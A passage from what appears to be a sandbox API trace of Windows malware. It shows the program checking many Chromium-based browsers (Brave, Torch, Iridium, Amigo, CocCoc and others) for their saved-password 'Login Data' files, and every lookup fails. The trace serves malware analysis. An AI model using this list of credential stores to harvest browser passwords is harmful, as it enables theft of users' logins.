(dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.506] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x45 [0237.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\chromium\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.506] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data\\Login Data", lpFilePart=0x0) returned 0x3d [0237.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\chromium\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.506] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x2f [0237.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\torch\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.506] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x42 [0237.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\torch\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.507] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data\\Login Data", lpFilePart=0x0) returned 0x3a [0237.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Torch\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\torch\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.507] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x45 [0237.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\bravesoftware\\brave-browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.507] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x58 [0237.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\bravesoftware\\brave-browser\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.508] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Login Data", lpFilePart=0x0) returned 0x50 [0237.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\bravesoftware\\brave-browser\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.508] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x31 [0237.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\iridium\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.508] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x44 [0237.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\iridium\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.509] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data\\Login Data", lpFilePart=0x0) returned 0x3c [0237.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Iridium\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\iridium\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.509] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x35 [0237.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\7star\\7star\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.509] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x48 [0237.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\7star\\7star\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.509] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data\\Login Data", lpFilePart=0x0) returned 0x40 [0237.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\7Star\\7Star\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\7star\\7star\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.510] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data", lpFilePart=0x0) returned 0x2f [0237.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\amigo\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.510] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x42 [0237.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\amigo\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.510] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data\\Login Data", lpFilePart=0x0) returned 0x3a [0237.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Amigo\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\amigo\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.511] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x35 [0237.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\centbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.511] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x48 [0237.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\centbrowser\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.511] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data\\Login Data", lpFilePart=0x0) returned 0x40 [0237.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CentBrowser\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\centbrowser\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.512] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x30 [0237.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\chedot\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.512] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x43 [0237.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\chedot\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.512] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data\\Login Data", lpFilePart=0x0) returned 0x3b [0237.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chedot\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\chedot\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.512] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x38 [0237.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.513] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\coccoc\\browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.513] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4b [0237.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.513] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\coccoc\\browser\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: 